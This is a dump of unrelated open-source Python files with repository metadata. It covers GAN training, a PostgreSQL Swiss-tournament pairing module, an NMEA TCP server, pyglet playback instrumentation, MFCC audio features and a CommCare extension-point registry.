# Set up optimiser and scheduler for the generator
g_optim = optimiser(gan.gen.parameters(), lr = lr)
g_sched = optim.lr_scheduler.StepLR(
g_optim,
step_size = lr_reduction_step,
gamma = lr_reduction_factor
)
epoch_it = it.count() if epochs is None else range(epochs)
for epoch in epoch_it:
avg_c_loss, avg_g_loss = 0, 0
with tqdm(total = len(dataloader) * dataloader.batch_size,
desc = f'Epoch {epoch:3}') as pbar:
for idx, reals in enumerate(dataloader):
# [batch_size, seq_len] -> [seq_len, batch_size, 1]
reals = reals[0].transpose(0, 1).unsqueeze(2)
# Get the batch size and sequence length of the batch
seq_len, batch_size, _ = reals.shape
##########################
### Train the critic ###
##########################
# Compute Wasserstein loss
c_optim.zero_grad()
noise = torch.randn_like(reals)
c_loss = torch.mean(gan(noise) - gan.crt(reals))
# Add an l2 regularisation term
norms = torch.FloatTensor([torch.norm(p)
for p in gan.crt.parameters()])
c_loss += l2_reg * (norms ** 2).sum()
# Compute average loss for logging
avg_c_loss += float(c_loss) / len(dataloader)
# Backprop gradients
c_loss.backward()
c_optim.step()
#############################
### Train the generator ###
#############################
# Compute Wasserstein loss
g_optim.zero_grad()
noise = torch.randn_like(reals)
g_loss = -torch.mean(gan(noise))
# Compute average loss for logging
avg_g_loss += float(g_loss) / len(dataloader)
# Backprop gradients
g_loss.backward()
g_optim.step()
# Update progress bar
pbar.update(dataloader.batch_size)
# Add to tensorboard
metrics = {'gen': float(g_loss), 'crt': float(c_loss)}
niter = epoch * len(dataloader) + (idx + 1)
writer.add_scalars(tensorboard_run, metrics, niter)
# Update learning rate schedulers
c_sched.step()
g_sched.step()
# Logging
pbar.set_description(\
f'Epoch {epoch:3} - '\
f'crt_loss {avg_c_loss:.3f} - '\
f'gen_loss {avg_g_loss:.3f}'
)
# Save model
path = Path.cwd().parent / datadir / f'{model_name}.zip'
scripted_gan = torch.jit.script(gan)
scripted_gan.save(str(path))
writer.close()
os.system('killall -9 tensorboard')
if __name__ == '__main__':
from data_prep import load_hdf
import matplotlib.pyplot as plt
hdf = load_hdf()
X = torch.FloatTensor(hdf['X'])
dataset = TensorDataset(X)
dataloader = DataLoader(dataset, batch_size = 32, shuffle = True)
SEED = 42
gan = RGAN(gen_dim = 256, crt_dim = 64, random_seed = SEED)
train_gan(gan, dataloader, random_seed = SEED)#, l2_reg = 0.1,
#lr_reduction_factor = 0.9, lr_reduction_step = 10)
#with torch.no_grad():
# gan = torch.jit.load('../.data/walmart_gan.zip')
# noise = torch.randn(143, 10, 1)
# fakes = gan(noise).squeeze().transpose(0, 1)
#rnds = torch.randint(0, X.size(0), (10,))
#reals = X[rnds, :]
#xs = torch.arange(X.shape[1])
#plt.figure(figsize = (10, 5))
#for real in reals:
# plt.plot(xs, real)
#plt.show()
#for fake in fakes:
# plt.plot(xs, fake)
# plt.show()
| 31.153374 | 70 | 0.553564 |
3ac6e2c853542d474ca9657e6b4eb7cb2c6c0546 | 10,312 | py | Python | tournament/tournament.py | singh-pratyush96/tournament-udacity | de895cf00b4799fe4193f38c30d8e0501fd95b68 | [
"MIT"
] | null | null | null | tournament/tournament.py | singh-pratyush96/tournament-udacity | de895cf00b4799fe4193f38c30d8e0501fd95b68 | [
"MIT"
] | null | null | null | tournament/tournament.py | singh-pratyush96/tournament-udacity | de895cf00b4799fe4193f38c30d8e0501fd95b68 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
#
# tournament.py -- implementation of a Swiss-system tournament
#
import psycopg2
from random import shuffle
def connect():
"""
Connect to the PostgreSQL database.
Returns a database connection and corresponding cursor.
"""
connection = psycopg2.connect("dbname=tournament")
cursor = connection.cursor()
return connection, cursor
def existsPlayer(pid):
"""
Check if a player exists
Args:
pid: Player ID
Returns: Status
"""
conn, cur = connect()
sql = 'select count(*) from players where pid = %s;'
cur.execute(sql, (pid,))
result = cur.fetchall()[0][0] == 1
conn.close()
return result
def existsTournament(tournamentid):
"""
Check if a tournament exists
Args:
tournamentid: Tournament ID
Returns: Status
"""
conn, cur = connect()
sql = 'select count(*) from tournaments where tid = %s;'
cur.execute(sql, (tournamentid,))
result = cur.fetchall()[0][0] == 1
conn.close()
return result
def existsTournamentPlayer(tournamentid, pid):
"""
Check if a player is registered for a tournament
Args:
tournamentid: Tournament ID
pid: Player ID
Returns: Status
"""
conn, cur = connect()
sql = 'select count(*) from tournamentplayers where tid = %s and pid = %s;'
cur.execute(sql, (tournamentid, pid))
result = cur.fetchall()[0][0] == 1
conn.close()
return result
def deleteMatches(tournamentid=-1):
"""
Remove all the match records from the database for a tournament.
If no argument is passed, delete all matches from all tournament.
Args:
tournamentid (int): ID of tournament of which matches are to be cleared
If no argument passed, reset all matches
Returns: Status
"""
conn, cur = connect()
if tournamentid == -1: # If no argument passed
sql = 'update tournamentplayers set wins = DEFAULT,' \
' matches = DEFAULT, lastoppid = default;'
cur.execute(sql)
else:
if not existsTournament(tournamentid):
conn.close()
return False
sql = 'update tournamentplayers set wins = DEFAULT,' \
' matches = DEFAULT, lastoppid = default where tid = %s;'
cur.execute(sql, (tournamentid,))
conn.commit()
conn.close()
return True
def deleteTournamentPlayers(tournamentid=-1):
"""
Remove all the player records from the database.
Args:
tournamentid (int): Tournament ID of which players are to be deleted.
If no argument passed, delete for all tournaments
Returns: Status
"""
conn, cur = connect()
if tournamentid == -1: # If no argument passed
sql = 'delete from tournamentplayers;'
else:
if not existsTournament(tournamentid):
conn.close()
return False
sql = 'delete from tournamentplayers where tid = %s;'
cur.execute(sql, (tournamentid,))
conn.commit()
conn.close()
return True
def countTournamentPlayers(tournamentid=-1):
"""Returns the number of players currently registered.
Args:
tournamentid (int): Tournament ID to count players.
If no argument, count players participated in any
tournament
Returns: Status, count of players
"""
conn, cur = connect()
# Get count of rows in player relation
if tournamentid == -1:
sql = 'select count(distinct pid) from tournamentplayers;'
cur.execute(sql)
else:
if not existsTournament(tournamentid):
conn.close()
return False, -1
sql = 'select count(distinct pid) from tournamentplayers ' \
'where tid = %s;'
cur.execute(sql, (tournamentid,))
player_count = cur.fetchall()[0][0]
conn.close()
return True, player_count
def playerCount():
"""
Count all players, whether registered or not
Returns: Number of players
"""
conn, cur = connect()
sql = 'select count(*) from players;'
cur.execute(sql)
count = cur.fetchall()[0][0]
conn.close()
return count
def registerPlayer(name):
"""Adds a player to the tournament database.
The database assigns a unique serial id number for the player. (This
should be handled by your SQL database schema, not in your Python code.)
Args:
name: the player's full name (need not be unique).
Returns: ID of registered player
"""
conn, cur = connect()
sql = 'insert into players (pname) values (%s) returning pid;'
cur.execute(sql, (name,))
pid = cur.fetchall()[0][0]
conn.commit()
conn.close()
return pid
def playerStandings(tournamentid=-1):
"""Returns a list of the players and their win records, sorted by wins.
The first entry in the list should be the player in first place, or a player
tied for first place if there is currently a tie.
Returns:
A list of tuples, each of which contains (id, name, wins, matches):
id: the player's unique id (assigned by the database)
name: the player's full name (as registered)
wins: the number of matches the player has won
matches: the number of matches the player has played
Returns: Status, list of tuples
"""
conn, cur = connect()
if tournamentid == -1:
sql = 'select * from all_tournament_player_stats;'
cur.execute(sql)
list1 = cur.fetchall()
else:
if not existsTournament(tournamentid):
conn.close()
return False, []
sql = 'select pid, pname, wins, matches from tournament_players_stats' \
' where tid = %s;'
cur.execute(sql, (tournamentid,))
list1 = cur.fetchall()
conn.close()
return True, list1
def clearPlayers():
"""
Delete all players
"""
conn, cur = connect()
sql = 'delete from players; delete from tournamentplayers;'
cur.execute(sql)
conn.commit()
conn.close()
def reportMatch(tournamentid, winner, loser):
"""
Report result of match. winner and loser are same
in case of a 'bye'
Args:
tournamentid: Tournament ID
winner: Winner ID
loser: Loser ID
Returns: Status
"""
conn, cur = connect()
if not existsTournamentPlayer(tournamentid, winner) or \
not existsTournamentPlayer(tournamentid, loser):
conn.close()
return False
sql = 'update tournamentplayers set matches = matches + 1,' \
' wins = wins + 1, lastoppid = %s where tid = %s and pid = %s;'
cur.execute(sql, (loser, tournamentid, winner))
if winner != loser: # If not a bye
sql = 'update tournamentplayers set matches = matches + 1,' \
' lastoppid = %s where tid = %s and pid = %s;'
cur.execute(sql, (winner, tournamentid, loser))
conn.commit()
conn.close()
def swissPairings(tournamentid):
"""
Returns a list of pairs of players for the next round of a match.
Assuming that there are an even number of players registered, each player
appears exactly once in the pairings. Each player is paired with another
player with an equal or nearly-equal win record, that is, a player adjacent
to him or her in the standings.
Returns:
A list of tuples, each of which contains (id1, name1, id2, name2)
id1: the first player's unique id
name1: the first player's name
id2: the second player's unique id
name2: the second player's name
"""
conn, cur = connect()
sql = 'select pid, pname, lastoppid from tournament_players_stats' \
' where tid = %s;'
cur.execute(sql, (tournamentid,))
players = cur.fetchall()
# Odd players, bye one who wasn't byed last time
if len(players) % 2 == 1:
tempList = list(players)
shuffle(tempList)
byed = False
randomFirst = tempList[0]
while not byed and len(tempList) > 0:
if tempList[0][0] == tempList[0][2]:
players.remove(tempList[0])
reportMatch(tournamentid, tempList[0][0], tempList[0][0])
byed = True
tempList.remove(tempList[0])
if not byed:
reportMatch(tournamentid, randomFirst[0], randomFirst[0])
players.remove(randomFirst)
# Arrange players, no rematch
pairs = []
while len(players) > 2: # No. of players will always be odd
player1 = players[0]
player2 = players[1]
if player1[2] == player2[0]:
player2 = players[2]
players.remove(player1)
players.remove(player2)
pairs.append((player1[0], player1[1], player2[0], player2[1]))
# Add remaining two players
pairs.append((players[0][0], players[0][1], players[1][0], players[1][1]))
conn.close()
return pairs
def addTournament(name):
"""
Register a new tournament
Args:
name: Name of tournament
Returns:
ID of tournament added
"""
conn, cur = connect()
sql = 'insert into tournaments (tname) values(%s) returning tid;'
cur.execute(sql, (name,))
tid = cur.fetchall()[0][0]
conn.commit()
conn.close()
return tid
def addPlayerTournament(tid, pid):
"""
Add a registered player to a tournament
Args:
tid: Tournament ID
pid: Player ID
Returns: Status
"""
if not existsTournament(tid) or not existsPlayer(pid):
return False
conn, cur = connect()
sql = 'insert into tournamentplayers (tid, pid) values (%s, %s);'
cur.execute(sql, (tid, pid))
conn.commit()
conn.close()
return True
def countTournaments():
"""
Count number of tournaments
Returns: Number of tournaments
"""
conn, cur = connect()
sql = 'select count(*) from tournaments;'
cur.execute(sql)
count = cur.fetchall()[0][0]
conn.close()
return count
def clearTournaments():
"""
Delete all tournaments
"""
conn, cur = connect()
sql = 'delete from tournamentplayers; delete from tournaments;'
cur.execute(sql)
conn.commit()
conn.close() | 25.715711 | 80 | 0.610357 |
b58cc492945714d0d8b1ebe20efb2cf75f90fb40 | 3,032 | py | Python | src/vanchor/devices/nmea_net.py | AlexAsplund/Vanchor | cb5d1c95567ab9d9bd280e2ca3022e4a2da1fa67 | [
"MIT"
] | 12 | 2021-09-25T01:03:31.000Z | 2022-02-04T09:13:00.000Z | src/vanchor/devices/nmea_net.py | AlexAsplund/Vanchor | cb5d1c95567ab9d9bd280e2ca3022e4a2da1fa67 | [
"MIT"
] | 13 | 2021-09-20T19:56:50.000Z | 2022-01-10T13:08:32.000Z | src/vanchor/devices/nmea_net.py | AlexAsplund/Vanchor | cb5d1c95567ab9d9bd280e2ca3022e4a2da1fa67 | [
"MIT"
] | 1 | 2021-10-05T10:49:59.000Z | 2021-10-05T10:49:59.000Z | import socketserver
from threading import Thread
class NmeaNet:
def __init__(self, main):
self.main = main
self.logger = main.logging.getLogger(self.__class__.__name__)
self.emitter = main.event.emitter
self.main.work_manager.start_worker(self.start)
def start(self, main):
self.logger.info("Starting NmeaNet server")
host = "0.0.0.0"
port = 10000
self.server = NmeaNetServer((host, port), NmeaTCPHandler, nmea_net=self)
self.server.serve_forever()
class NmeaTCPHandler(socketserver.BaseRequestHandler):
def __init__(self, nmea_net, *args, **kwargs):
self.main = nmea_net.main
self.logger = self.main.logging.getLogger(self.__class__.__name__)
self.emitter = self.main.event.emitter
super().__init__(*args, **kwargs)
def send_event(self, message):
self.logger.info("Sending NMEA")
msg = message[0]
self.request.sendall(bytes(msg, "utf-8"))
def handle(self):
while 1:
try:
rec = self.request.recv(1024)
try:
self.data = rec.decode("ascii")
except:
self.data = rec.decode("utf-8")
self.data.replace("\r\n", "")
if self.data and self.data[0] == "$":
self.logger.info("Sending raw NMEA message: {}".format(self.data))
self.emitter.emit("nmea.parse", self.data)
elif self.data == "" or self.data == "\r\n":
None
else:
self.logger.info(
"Invalid data received: {} | {}".format(self.data, rec)
)
self.request.sendall(bytes(f"ERROR: Invalid data\r\n", "ascii"))
except Exception as e:
self.logger.warning("Failed to process message", e)
def finish(self):
self.logger.debug("{}".format(self.client_address))
return socketserver.BaseRequestHandler.finish(self)
class NmeaNetServer(socketserver.TCPServer):
def __init__(self, *args, nmea_net, **kwargs):
super().__init__(*args, **kwargs)
self.nmea_net = nmea_net
self.main = nmea_net.main
self.logger = self.main.logging.getLogger(self.__class__.__name__)
self.emitter = self.main.event.emitter
def finish_request(self, request, client_address):
"""Finish one request by instantiating RequestHandlerClass."""
self.logger.info("{} request finished".format(client_address[0]))
self.RequestHandlerClass(self.nmea_net, request, client_address, self)
def verify_request(self, request, client_address):
self.logger.debug("verify_request(%s, %s)", request, client_address)
return socketserver.TCPServer.verify_request(
self,
request,
client_address,
)
| 36.095238 | 87 | 0.573219 |
f4eaa4061bfed62c1da74b49767bf9af46595249 | 12,597 | py | Python | pyglet/media/instrumentation.py | SwineProject/pyglet | f0203870bef94d4349ad16f060c941d45270a0b5 | [
"BSD-3-Clause"
] | null | null | null | pyglet/media/instrumentation.py | SwineProject/pyglet | f0203870bef94d4349ad16f060c941d45270a0b5 | [
"BSD-3-Clause"
] | null | null | null | pyglet/media/instrumentation.py | SwineProject/pyglet | f0203870bef94d4349ad16f060c941d45270a0b5 | [
"BSD-3-Clause"
] | null | null | null | # ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2018 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
"""
Responsabilities
Defines the events that modify media_player state
Defines which events are potential defects
Gives the low level support to extract info from the recorded data
For new code here, keep accepting and returning only data structures,
never paths or files.
"""
# events definition
mp_events = {
"version": 1.1,
# <evname>: {
# "desc": <description used in reports to mention the event>,
# "update_names": <list of names of fields updated>,
# "other_fields": <list of additionals fields to show when mention the
# event in a report>
# },
"crash": {
"desc": "media_player crashed.",
"update_names": ["evname", "sample"],
"other_fields": [],
"test_cases": [("crash", "small.mp4")]
},
"mp.im": {
"desc": "Play",
"update_names": ["evname", "sample"],
"other_fields": [],
"test_cases": [("mp.im", 3, "small.mp4")]
},
"p.P._sp": {
"desc": "Start playing",
"update_names": ["evname", "wall_time"],
"other_fields": [],
"test_cases": [("p.P._sp", 1.23)]
},
"p.P.sk": {
"desc": "Seek",
"update_names": ["evname", "seek_to_time"],
"other_fields": [],
"test_cases": [("p.P.sk", 1.23), ("p.P.sk", None)]
},
"p.P.ut.1.0": {
"desc": "Enter update_texture",
"update_names": ["evname", "pyglet_dt", "current_time",
"audio_time", "wall_time"],
"other_fields": [],
"test_cases": [("p.P.ut.1.0", 0.02, 2.31, 2.28, 1.21),
("p.P.ut.1.0", 0.02, None, 2.28, 1.21),
("p.P.ut.1.0", None, 2.31, 2.28, 1.21)]
},
"p.P.ut.1.5": {
"desc": "Discard video frame too old,",
"update_names": ["evname", "video_time"],
"other_fields": ["current_time"],
"test_cases": [("p.P.ut.1.5", 1.21)]
},
"p.P.ut.1.6": {
"desc": "Current video frame,",
"update_names": ["evname", "video_time"],
"other_fields": [],
"test_cases": [("p.P.ut.1.6", 1.21)]
},
"p.P.ut.1.7": {
"desc": "Early return doing nothing because video_time is None (likely EOV),",
"update_names": ["evname", "rescheduling_time"],
"other_fields": [],
"test_cases": [("p.P.ut.1.7", 0.02)]
},
"p.P.ut.1.8": {
"desc": "Image frame is None (?)",
"update_names": ["evname"],
"other_fields": [],
"test_cases": [("p.P.ut.1.8",)]
},
# in log_render_anomalies list only if rescheduling_time < 0
"p.P.ut.1.9": {
"desc": "Re-scheduling,",
"update_names": ["evname", "rescheduling_time", "next_video_time"],
"other_fields": [],
"test_cases": [("p.P.ut.1.9", 0.02, None), ("p.P.ut.1.9", 0.02, 2.7)]
},
# crash_detection relies in this being the last event in the log_entries
"p.P.oe": {
"desc": ">>> play ends",
"update_names": ["evname"],
"other_fields": [],
"test_cases": [("p.P.oe",)]
},
}
# events to examine for defects detection
mp_bads = {"crash", "p.P.ut.1.5", "p.P.ut.1.7", "p.P.ut.1.8"}
class MediaPlayerStateIterator(object):
"""Exposes for analysis the sequence of media_player states
Typical use
mp_states = MediaPlayerStateIterator()
for st in mp_states:
do something with st, the current media_player state.
If desired a callback can be called just before processing an event, the
signature is
fn_pre_event(event, state_before_event)
The mp state is handled as a dict, with keys in cls.fields
"""
fields = {
# real
"evname": None,
"evnum": -1, # synthetic, ordinal last event processed
"sample": None,
"wall_time": None,
"current_time": None,
"audio_time": None,
"seek_to_time": None,
"pyglet_dt": None,
"video_time": None,
"rescheduling_time": None,
"next_video_time": None,
# synthetics, probably invalid after using seek
"pyglet_time": 0,
"frame_num": 0,
}
def __init__(self, recorded_events, events_definition=mp_events, fn_pre_event=None):
self.fn_pre_event = fn_pre_event
self.state = dict(self.fields)
self.events_definition = events_definition
self.iter_events = iter(recorded_events)
version_args = next(self.iter_events)
assert version_args == ("version", self.events_definition["version"])
def __iter__(self):
return self
def __next__(self):
event = next(self.iter_events)
if self.fn_pre_event is not None:
self.fn_pre_event(event, self.state)
event_dict = self.event_as_dict(event)
self.update(event_dict)
return self.state
def event_as_dict(self, event):
names = self.events_definition[event[0]]["update_names"]
updated = {a: b for a, b in zip(names, event)}
return updated
def update(self, event_dict):
self.state.update(event_dict)
self.state["evnum"] += 1
evname = event_dict["evname"]
if evname == "p.P.ut.1.0":
self.state["pyglet_time"] += event_dict["pyglet_dt"]
elif evname == "p.P.ut.1.5" or evname == "p.P.ut.1.9":
self.state["frame_num"] += 1
class TimelineBuilder(object):
"""At each call to player.Player.update_texture we capture selected player
state, before accepting the changes in the event. This is the same as
capturing the state at the end of previous update call.
Output is a sequence of tuples capturing the desired fields.
Meant to extract info on behalf of other sw, especially visualization.
"""
def __init__(self, recorded_events, events_definition=mp_events):
mp = MediaPlayerStateIterator(recorded_events, events_definition, self.pre)
self.mp_state_iterator = mp
self.timeline = []
def pre(self, event, st):
if event[0] == "p.P.ut.1.0":
p = (st["wall_time"], st["pyglet_time"], st["audio_time"],
st["current_time"], st["frame_num"], st["rescheduling_time"])
self.timeline.append(p)
def get_timeline(self):
"""remember video_time and audio_time can be None"""
# real work is done in rhe callback pre
for st in self.mp_state_iterator:
pass
# The first entry is bogus, because there was no previous call so discard
return self.timeline[1:]
def timeline_postprocessing(timeline):
""" Eliminates Nones in timeline so other software don't error.
Extra lists are built for the vars with nones, each list with one point
for each None in the form (wall_time, prev_value).
"""
current_time_nones = []
audio_time_nones = []
old_current_time = 0
old_audio_time = 0
filtered_timeline = []
for wall_time, pt, audio_time, current_time, fnum, rt in timeline:
if current_time is None:
current_time = old_current_time
current_time_nones.append((wall_time, old_current_time))
else:
current_time_time = current_time
if audio_time is None:
audio_time = old_audio_time
audio_time_nones.append((wall_time, old_audio_time))
else:
old_audio_time = audio_time
filtered_timeline.append((wall_time, pt, audio_time, current_time, fnum, rt))
return filtered_timeline, current_time_nones, audio_time_nones
# works for buffered log, needs other implementation if unbuffered
def crash_detected(recorded_events):
crashed = recorded_events[-1][0] != "p.P.oe"
return crashed
class CountBads(object):
"""Helper to report anomalies in the media_player states seen when playing
a sample.
- provides .anomalies_description, a dict <anomaly>: <description>
- calling .count_bads(recorded_events) will return a dict of
anomaly: <count times anomaly detected>
- preprocessing: ad-hoc prefiltering the events stream for noise reduction
"""
def __init__(self, events_definition=mp_events, bads=mp_bads):
self.events_definition = events_definition
self.bads = bads
self.anomalies_description = self.build_anomalies_description()
def build_anomalies_description(self):
"""builds descriptions for the anomalies"""
d = self.events_definition
anomalies_description = {evname: d[evname]["desc"] for evname in self.bads}
anomalies_description["scheduling_in_past"] = "Scheduling in the past"
return anomalies_description
def preprocessing(self, recorded_events):
"""
I see all recordings ending with some potential anomalies in the few
frames just before the '>>> play ends'; visually the play is perfect so
I assume they are false positives if just at EOF. Deleting the offending
events (only if near EOL) to reduce noise in summarize.py
"""
recorded_events = list(recorded_events)
if (len(recorded_events) > 9 and
recorded_events[-2][0] == "p.P.ut.1.7" and
recorded_events[-6][0] == "p.P.ut.1.7" and
recorded_events[-10][0] == "p.P.ut.1.7"
):
del recorded_events[-10]
del recorded_events[-6]
del recorded_events[-2]
elif (len(recorded_events) > 6 and
recorded_events[-2][0] == "p.P.ut.1.7" and
recorded_events[-6][0] == "p.P.ut.1.7"
):
del recorded_events[-6]
del recorded_events[-2]
elif (len(recorded_events) > 2 and
recorded_events[-2][0] == "p.P.ut.1.7"
):
del recorded_events[-2]
return recorded_events
def count_bads(self, recorded_events):
"""returns counts of anomalies as a dict of anomaly: count
recorded_events: media_player events recorded while playing a sample
Notice that 'counters' has one more key than 'bads': "scheduling_in_past"
"""
recorded_events = self.preprocessing(recorded_events)
counters = {k: 0 for k in self.bads}
cnt_scheduling_in_past = 0
mp_states = MediaPlayerStateIterator(recorded_events, self.events_definition)
for st in mp_states:
evname = st["evname"]
if evname in counters:
counters[evname] += 1
elif ("p.P.ut.1.9" and
st["rescheduling_time"] is not None and
st["rescheduling_time"] < 0):
cnt_scheduling_in_past += 1
counters["scheduling_in_past"] = cnt_scheduling_in_past
return counters
| 37.491071 | 88 | 0.609431 |
5d567e95c7601027cbc4d0f451a26ff9804ba951 | 835 | py | Python | src/music_genre_mfcc.py | Cyofanni/music-genre-classification | 05977e25146697426231017feff0624c09bdb96f | [
"MIT"
] | null | null | null | src/music_genre_mfcc.py | Cyofanni/music-genre-classification | 05977e25146697426231017feff0624c09bdb96f | [
"MIT"
] | null | null | null | src/music_genre_mfcc.py | Cyofanni/music-genre-classification | 05977e25146697426231017feff0624c09bdb96f | [
"MIT"
] | null | null | null | from scikits.talkbox.features import mfcc
import scipy
from scipy.io import wavfile
import numpy as np
import os
import glob
def write_ceps(ceps, filename):
base_filename, ext = os.path.splitext(filename)
data_filename = base_filename + ".ceps"
np.save(data_filename, ceps)
print("Written %s" % data_filename)
def create_ceps(fn):
s_rate, X = scipy.io.wavfile.read(fn)
ceps, mspec, spec = mfcc(X)
write_ceps(ceps, fn)
def read_ceps(genre_list, base_dir):
X, y = [], []
for l, g in enumerate(genre_list):
for fn in glob.glob(os.path.join(base_dir, g, "*.ceps.npy")):
ceps = np.load(fn)
num_ceps = len(ceps)
X.append(np.mean(ceps[int(num_ceps*1/10):int(num_ceps*9/10)], axis=0))
#X.append(np.mean(ceps, axis=0)) #doesn't help, it only increases running time
y.append(l)
return np.array(X), np.array(y)
| 26.09375 | 83 | 0.702994 |
b9e92d29f53986ccc9ec9da4292db3cf2da5d11e | 4,961 | py | Python | corehq/extensions/interface.py | dimagilg/commcare-hq | ea1786238eae556bb7f1cbd8d2460171af1b619c | [
"BSD-3-Clause"
] | 1 | 2020-07-14T13:00:23.000Z | 2020-07-14T13:00:23.000Z | corehq/extensions/interface.py | dimagilg/commcare-hq | ea1786238eae556bb7f1cbd8d2460171af1b619c | [
"BSD-3-Clause"
] | 94 | 2020-12-11T06:57:31.000Z | 2022-03-15T10:24:06.000Z | corehq/extensions/interface.py | dimagilg/commcare-hq | ea1786238eae556bb7f1cbd8d2460171af1b619c | [
"BSD-3-Clause"
] | null | null | null | import importlib
import inspect
import itertools
import logging
from enum import Enum
from dimagi.utils.logging import notify_exception
logger = logging.getLogger("commcare.extensions")
class ExtensionError(Exception):
pass
class ResultFormat(Enum):
FLATTEN = 'flatten'
FIRST = 'first'
def flatten_results(point, results):
return list(itertools.chain.from_iterable(results))
def first_result(point, results):
try:
return next(results)
except StopIteration:
pass
RESULT_FORMATTERS = {
ResultFormat.FIRST: first_result,
ResultFormat.FLATTEN: flatten_results
}
class Extension:
def __init__(self, point, callable_ref, domains):
self.point = point
self.callable = callable_ref
self.domains = set(domains) if domains else None
def validate(self, expected_args):
spec = inspect.getfullargspec(self.callable)
unconsumed_args = set(expected_args) - set(spec.args)
if unconsumed_args and not spec.varkw:
raise ExtensionError(f"Not all extension point args are consumed: {unconsumed_args}")
def should_call_for_domain(self, domain):
return self.domains is None or domain in self.domains
def __call__(self, *args, **kwargs):
return self.callable(*args, **kwargs)
def __repr__(self):
return f"{self.callable}"
class ExtensionPoint:
def __init__(self, manager, name, definition_function, result_formatter=None):
self.manager = manager
self.name = name
self.definition_function = definition_function
self.providing_args = inspect.getfullargspec(definition_function).args
self.extensions = []
self.result_formatter = result_formatter
self.__doc__ = inspect.getdoc(definition_function)
def extend(self, impl=None, *, domains=None):
def _extend(impl):
if self.manager.locked:
raise ExtensionError(
"Late extension definition. Extensions must be defined before setup is complete"
)
if not callable(impl):
raise ExtensionError(f"Extension point implementation must be callable: {impl!r}")
extension = Extension(self.name, impl, domains)
extension.validate(self.providing_args)
self.extensions.append(extension)
return impl
if domains is not None and not isinstance(domains, list):
raise ExtensionError("domains must be a list")
if domains is not None and "domain" not in self.providing_args:
raise ExtensionError("domain filtering not supported for this extension point")
return _extend if impl is None else _extend(impl)
def __call__(self, *args, **kwargs):
callargs = inspect.getcallargs(self.definition_function, *args, **kwargs)
domain = callargs.get('domain')
extensions = [
extension for extension in self.extensions
if not domain or extension.should_call_for_domain(domain)
]
results = self._get_results(extensions, *args, **kwargs)
if self.result_formatter:
return self.result_formatter(self, results)
return list(results)
def _get_results(self, extensions, *args, **kwargs):
for extension in extensions:
try:
result = extension(*args, **kwargs)
if result is not None:
yield result
except Exception: # noqa
notify_exception(
None,
message="Error calling extension",
details={
"extention_point": self.name,
"extension": extension,
"kwargs": kwargs
},
)
class CommCareExtensions:
def __init__(self):
self.registry = {}
self.locked = False
def extension_point(self, func=None, *, result_format=None):
"""Decorator for creating an extension point."""
def _decorator(func):
if not callable(func):
raise ExtensionError(f"Extension point must be callable: {func!r}")
name = func.__name__
formatter = RESULT_FORMATTERS[result_format] if result_format else None
point = ExtensionPoint(self, name, func, result_formatter=formatter)
self.registry[name] = point
return point
return _decorator if func is None else _decorator(func)
def load_extensions(self, implementations):
for module_name in implementations:
self.resolve_module(module_name)
self.locked = True
def add_extension_points(self, module_or_name):
self.resolve_module(module_or_name)
def resolve_module(self, module_or_name):
if isinstance(module_or_name, str):
importlib.import_module(module_or_name)
| 32.854305 | 100 | 0.636767 |
5089a76de2298aeb14b6115ce1c88c159d7cce5e | 720 | py | Python | motor_control.py | cpu-robotics/Clyde | 345d757a5410cd4903764146c86b4f14af14a797 | [
"MIT"
] | null | null | null | motor_control.py | cpu-robotics/Clyde | 345d757a5410cd4903764146c86b4f14af14a797 | [
"MIT"
] | null | null | null | motor_control.py | cpu-robotics/Clyde | 345d757a5410cd4903764146c86b4f14af14a797 | [
"MIT"
] | 1 | 2019-04-18T18:24:44.000Z | 2019-04-18T18:24:44.000Z | #!/usr/bin/env python
"""motor_control.py: Motor control via a Sabertooth 2x25 motor controller """
__author__ = "Nick Vazquez"
__copyright__ = "Copyright 2020, Davenport Central Robotics Teams"
# Import all Necessary Classes
import serial
import math
import functions
# Used for the verification of the baud rate by the motor controller
rateVerify = '170'
# Open a serial terminal with the port 'dev/tty0'
drive = serial.Serial(port='/dev/tty0')
# Print the name of the port that was connected to for verification
print(drive.name)
# Used by the Sabertooth motor controller to autodetect the Baud Rate used by the transmitting device
drive.write(rateVerify)
functions.trackDrive(130, 127, 'forward', 127)
| 28.8 | 101 | 0.768056 |
baa184074dfb98baf0749a0a48d296f3cf4e9a22 | 8,129 | py | Python | grader_lib/datalayer.py | rmok57/sketchresponse | 1bc8123cc6e21137c6b5cc15719ba26ad41bcd54 | [
"MIT"
] | 11 | 2016-06-28T13:35:03.000Z | 2021-07-07T06:14:07.000Z | grader_lib/datalayer.py | rmok57/sketchresponse | 1bc8123cc6e21137c6b5cc15719ba26ad41bcd54 | [
"MIT"
] | 37 | 2016-06-29T13:16:38.000Z | 2022-02-27T01:18:08.000Z | grader_lib/datalayer.py | rmok57/sketchresponse | 1bc8123cc6e21137c6b5cc15719ba26ad41bcd54 | [
"MIT"
